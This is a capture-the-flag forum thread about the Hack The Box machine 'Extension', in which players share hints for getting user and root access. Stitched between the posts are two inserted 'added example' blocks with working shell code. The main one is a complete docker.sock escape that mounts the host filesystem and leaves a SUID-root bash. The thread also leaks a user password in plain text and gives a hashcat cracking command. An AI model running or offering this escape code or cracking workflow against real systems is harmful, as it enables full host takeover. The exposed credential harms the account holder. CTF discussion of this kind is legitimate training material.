Extension - HTB [Discussion]
(July 25, 2022, 03:27 PM)jon01 Wrote:
(July 25, 2022, 03:13 PM)fironeDerbert Wrote:
(July 23, 2022, 04:19 PM)Erik Wrote: Quick summary for root steps, as user steps have already been done:
- Once you're logged in as jean, search for dangerous php functions in laravel-app, using grep -Ri 'your php command' for example
- After understanding what could be exploited, forward the mysql port using ssh port forwarding, or any existing tool like chisel. The database creds can be obtained using pspy
- Perform RCE on snippet.htb by exploiting the dangerous php function
- Get a new shell logged in as application
- Escape from the docker container. If you have no idea where to start, this can help you : https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation


How do you log in as jean, since we are connected via SSH to charlie there?

There is jean's password, or you can do su "EHmfar1Y7ppA9O5TAIXnYnJpA"

Oh no, this is not right if you just share the password! Just run the linpeas.sh script on Charlie, and you will find Jean's credential! (It's git-credentials.)
Reply
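Erik's first two root steps in concrete form, as an added example that is not part of any post in this thread: a grep over the Laravel tree for the PHP functions that hand their argument to a shell or to the interpreter, skipping vendor/ and storage/ so Composer packages and cached Blade views do not drown out the application's own code. The directory layout and the sink list are my assumptions, not something the thread states.

```shell
#!/bin/sh
# Added example, not from the thread: hunting for command-execution and
# code-evaluation sinks in a Laravel code base. The directory passed in
# (e.g. /var/www/laravel-app) is an assumption.

# PHP functions that pass their argument to a shell or to the PHP
# interpreter. include/require with a variable path are also worth a
# second grep, but they usually appear without parentheses and are
# not matched by the pattern below.
PHP_SINKS='shell_exec|exec|system|passthru|popen|proc_open|pcntl_exec|eval|assert|create_function|unserialize'

# Print "file:line:text" for every call to one of the sinks under $1.
# vendor/ and storage/ are skipped: third-party packages and compiled
# views produce hundreds of hits that are not the application's code.
# The leading (^|[^[:alnum:]_]) keeps exec_time( from matching exec(.
find_php_sinks() {
    dir="$1"
    grep -rnE --include='*.php' \
        --exclude-dir=vendor --exclude-dir=storage \
        "(^|[^[:alnum:]_])($PHP_SINKS)[[:space:]]*\(" "$dir"
}

# Number of hits, for a quick feel of how much reading is ahead.
count_php_sinks() {
    find_php_sinks "$1" | wc -l | tr -d ' '
}
```

Every hit still needs reading: a sink fed a constant is harmless, a sink fed request data, a database column or a config value is the candidate. The MySQL forward Erik mentions is the usual `ssh -L 3306:127.0.0.1:3306 jean@<target>`, after which the database answers on your own 127.0.0.1:3306; pspy, which logs the command lines of processes as they start, is what the thread suggests for recovering the database credentials.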
(July 25, 2022, 03:27 PM)jon01 Wrote:
(July 25, 2022, 03:13 PM)fironeDerbert Wrote:
(July 23, 2022, 04:19 PM)Erik Wrote: Quick summary for root steps, as user steps have already been done:
- Once you're logged in as jean, search for dangerous php functions in laravel-app, using grep -Ri 'your php command' for example
- After understanding what could be exploited, forward the mysql port using ssh port forwarding, or any existing tool like chisel. The database creds can be obtained using pspy
- Perform RCE on snippet.htb by exploiting the dangerous php function
- Get a new shell logged in as application
- Escape from the docker container. If you have no idea where to start, this can help you : https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation


How do you log in as jean, since we are connected via SSH to charlie there?

There is jean's password, or you can do su "


Please delete the password, man. Especially after all we went through.
Reply
For the desperate minds -> https://github.com/stealthcopter/deepce
and feel free to send pull requests. It's full of TODOs, but is very useful.
Reply
(July 25, 2022, 10:20 PM)undeadly Wrote: For the desperate minds -> https://github.com/stealthcopter/deepce
and feel free to send pull requests. It's full of TODOs, but is very useful.


Hmm, I can see the socket, can talk to the API via it, create containers, etc., but can't seem to leverage it to get a rev shell back or mount a volume.

Anyone care to outline their method?
Reply
(July 19, 2022, 11:12 PM)mimikatz Wrote:
(July 19, 2022, 11:11 PM)Erik Wrote:
(July 19, 2022, 11:10 PM)mimikatz Wrote:
(July 19, 2022, 11:06 PM)Erik Wrote:
(July 19, 2022, 10:54 PM)mimikatz Wrote: Are we supposed to crack the passwords of Charlie and/or Jean on dev.snippet.htb?  I dumped that user table but only cracked accounts unrelated to the dev sub domain.


If you're talking about the dump from snippet.htb, nah, you need to crack all of the hashes. If you somehow got another set of hashes from dev.snippet.htb, I'd love to know how you did that, because I'm definitely stuck trying to get anything from the XSS.


hashcat --username -m 1400 -a 0 snippethtb.txt -o cracked.txt realuniq.lst


This is what I used, and it only cracked password123, which doesn't help me at all. I tried John with rockyou just in case and had no luck either. Did you apply a mask by chance? I did read the previous comments, but they didn't help.


This is to be used on snippet.htb first. You have another step there before heading to dev.snippet.htb.


Awww, okay, I will take another look. I had figured password reuse from that table we dumped via management/dump was the key.


I'm stuck here, same password and I don't know where to go, any nudge?
Reply
(July 27, 2022, 02:24 AM)skyweasel Wrote: Hmm, I can see the socket, can talk to the API via it, create containers, etc., but can't seem to leverage it to get a rev shell back or mount a volume.

Anyone care to outline their method?


Google "docker.sock exploit".
You will find this script: https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
A few modifications are necessary.

(July 27, 2022, 11:21 AM)fittale1754 Wrote: I'm stuck here, same password and I don't know where to go, any nudge?


Log into http://snippet.htb/login
Reply
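What skyweasel was missing, as an added example that is neither a post from this thread nor the gist Exa links: with a writable Docker socket you do not need a reverse shell out of the new container, you bind-mount the host's root filesystem into it and let the container's root write to it. Everything below is plain curl against the Engine API over the Unix socket; the socket path, the image name, the /host mount point and the SUID-bash payload are my assumptions.

```shell
#!/bin/sh
# Added example, not from the thread or the linked gist: escaping to the
# host through a reachable docker.sock with nothing but curl and sed.

SOCK="${DOCKER_SOCK:-/var/run/docker.sock}"   # assumption: adjust to the path you found
IMAGE="${IMAGE:-alpine}"                       # assumption: must already exist on the daemon

# Talk to the Engine API over the Unix socket. curl ignores the host part
# of the URL when --unix-socket is given, so "localhost" is a placeholder.
sock_api() {
    method="$1"; path="$2"; body="${3:-}"
    if [ -n "$body" ]; then
        curl -s --unix-socket "$SOCK" -X "$method" \
            -H 'Content-Type: application/json' -d "$body" "http://localhost$path"
    else
        curl -s --unix-socket "$SOCK" -X "$method" "http://localhost$path"
    fi
}

# JSON body for POST /containers/create: bind the host's / at /host inside
# the new container and run the command as the container's root. On the
# bind mount that uid 0 is the host's uid 0, which is the whole escalation.
# The command must not contain double quotes; no JSON escaping is done here.
create_body() {
    image="$1"; shift
    printf '{"Image":"%s","Cmd":["sh","-c","%s"],"HostConfig":{"Binds":["/:/host"]}}' "$image" "$*"
}

# Pull the hex container Id out of the create response without needing jq,
# which is often absent on a target. Prints nothing on an error response.
container_id() {
    sed -n 's/.*"Id":"\([0-9a-f]*\)".*/\1/p'
}

# Images the daemon already has; create fails with "No such image" otherwise.
list_images() {
    sock_api GET /images/json
}

escape_via_sock() {
    [ -S "$SOCK" ] || { echo "no docker socket at $SOCK" >&2; return 1; }
    sock_api GET /version >/dev/null \
        || { echo "socket exists but the API does not answer (permissions?)" >&2; return 1; }
    # Leave a SUID-root bash on the HOST filesystem through the bind mount.
    id="$(sock_api POST /containers/create \
            "$(create_body "$IMAGE" 'cp /host/bin/bash /host/tmp/rootbash && chmod 4755 /host/tmp/rootbash')" \
          | container_id)"
    [ -n "$id" ] || { echo "create failed; run list_images and pick an image that exists" >&2; return 1; }
    sock_api POST "/containers/$id/start" >/dev/null
    sock_api POST "/containers/$id/wait" >/dev/null
    echo "container $id finished; on the host run: /tmp/rootbash -p"
}

# Only act when invoked as "sh escape.sh run"; sourcing the file just
# defines the helpers so they can be used interactively.
if [ "${1:-}" = "run" ]; then
    escape_via_sock
fi
```

The resulting /tmp/rootbash sits in the host's /tmp, so if the daemon runs on the same box as your jean SSH session you execute it from there with `-p` (without `-p`, bash drops the effective uid). No port has to be reachable from the container and no volume is "mounted" afterwards by hand: the HostConfig.Binds entry in the create request is the mount.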
(July 27, 2022, 12:02 PM)Exa Wrote:
(July 27, 2022, 02:24 AM)skyweasel Wrote: Hmm, I can see the socket, can talk to the API via it, create containers, etc., but can't seem to leverage it to get a rev shell back or mount a volume.

Anyone care to outline their method?



Google "docker.sock exploit".
You will find this script: https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
A few modifications are necessary.


(July 27, 2022, 11:21 AM)fittale1754 Wrote: I'm stuck here, same password and I don't know where to go, any nudge?


Log into http://snippet.htb/login


Yep, logged in as letha, I can see a snippet from Isaac, but nothing to do...
Reply
(July 27, 2022, 12:08 PM)fittale1754 Wrote:
(July 27, 2022, 12:02 PM)Exa Wrote:
(July 27, 2022, 02:24 AM)skyweasel Wrote: Hmm, I can see the socket, can talk to the API via it, create containers, etc., but can't seem to leverage it to get a rev shell back or mount a volume.

Anyone care to outline their method?



Google "docker.sock exploit".
You will find this script: https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
A few modifications are necessary.


(July 27, 2022, 11:21 AM)fittale1754 Wrote: I'm stuck here, same password and I don't know where to go, any nudge?


Log into http://snippet.htb/login


Yep, logged in as letha, I can see a snippet from Isaac, but nothing to do...


Create a snippet. Edit it and make it public/private. Analyze the HTTP traffic.
Reply
(July 27, 2022, 12:02 PM)Exa Wrote: Google "docker.sock exploit".
You will find this script: https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
A few modifications are necessary.

Cheers Exa, yea this did the trick. I was trying to do this manually but was obviously missing a few options. Good find, worked a treat. Thx
Reply
I'm on root atm. I figured the next step is to exploit a vulnerable function in the Laravel app that executes system commands. But to exploit it, I need the app secret, which is perhaps in the docker container. How am I supposed to be able to get that app secret? Any nudge please?

Don't worry, I figured out that you don't have to find the app_secret, because you can make the backend calculate it for you as long as you are a user in the db.
Reply

